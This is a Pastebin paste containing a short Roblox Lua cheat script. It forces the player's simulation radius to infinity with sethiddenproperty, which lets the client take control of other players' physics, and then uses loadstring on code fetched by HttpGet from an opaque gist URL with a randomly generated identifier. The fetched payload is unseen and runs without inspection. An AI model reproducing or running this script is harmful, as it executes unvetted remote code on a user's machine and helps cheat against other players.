Advertisement
foxywolf233

heyguys

Jun 8th, 2022
28
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.67 KB | None | 0 0
  1. local LocalPlayer = game:GetService("Players").LocalPlayer
  2. local Heartbeat = game:GetService("RunService").Heartbeat
  3.  
  4. Heartbeat:Connect(function()
  5. LocalPlayer.MaximumSimulationRadius = math.huge
  6. sethiddenproperty(LocalPlayer, "SimulationRadius", math.huge)
  7. end)
  8.  
  9. getgenv().Theme = "Purple"
  10. loadstring(game:HttpGet("https://gist.githubusercontent.com/M6HqVBcddw2qaN4s/2d722888a388017c18028cd434c43a25/raw/dcccf1027fe4b90780e47767aaf584389c9d7771/EULma3fU90PUOKUn?identifier=".. (function()local a=""for b=1,256 do local c=math.random(1,3)a=a..string.char(c==1 and math.random(48,57)or c==2 and math.random(97,122)or c==3 and math.random(65,90))end;return a end)()))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement